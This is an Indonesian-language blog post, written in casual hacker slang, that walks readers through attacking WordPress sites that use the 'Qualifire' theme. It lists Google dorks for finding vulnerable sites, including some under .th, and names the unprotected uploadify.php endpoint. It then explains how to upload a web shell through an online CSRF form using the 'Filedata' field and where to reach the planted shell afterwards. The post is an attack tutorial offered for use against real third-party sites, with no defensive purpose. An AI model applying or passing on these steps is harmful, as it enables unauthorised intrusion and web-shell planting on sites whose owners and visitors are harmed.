akhirnya nemu juga buat jadiin bahan blog wowkowkowk langsung saja
Dork :
inurl:"/wp-content/themes/qualifire/ site:th
inurl:"/wp-content/themes/qualifire/
*kembangkan oke
Exploitnya:"/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
*tanpa tanda kutip ya gan :'v
ciri ciri vuln ? blank page :'v
karena ini butuh csrf w sediakan csrf onlinenya :)
csrf online : Click here
oke selanjutnya adalah kita mengexploitasi target
pertama kalian dorking dulu trus exploit :"v
ok yang kedua adalah memasukkan target ke csrf nya
nah isi seperti itu
URL : url target dengan exploit
contoh : http://target.com/wpcontent/themes/qualifire/scripts/admin/uploadify/uploadify.php
Post File : isi dengan Filedata
nah klo sudah kita pencet Kunci Target kamu upload shell atau sc
disini gue upload gambar :v
kalau sudah tinggal pencet 'upload cok'
kalau berhasil bakal muncul angka 1 seperti punya gue
nah kalau seperti itu berarti berhasil ter upload
tuh liat punya saya hehehehe
akses shell nya ? http://site.com/namashell
masih kurang faham ? tenang ada vidionya kok ;) cekidot
sekian terima kasih :*